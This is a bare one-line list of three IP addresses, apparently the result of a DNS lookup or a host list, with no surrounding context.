104.26.12.31, 104.26.13.31, 172.67.75.172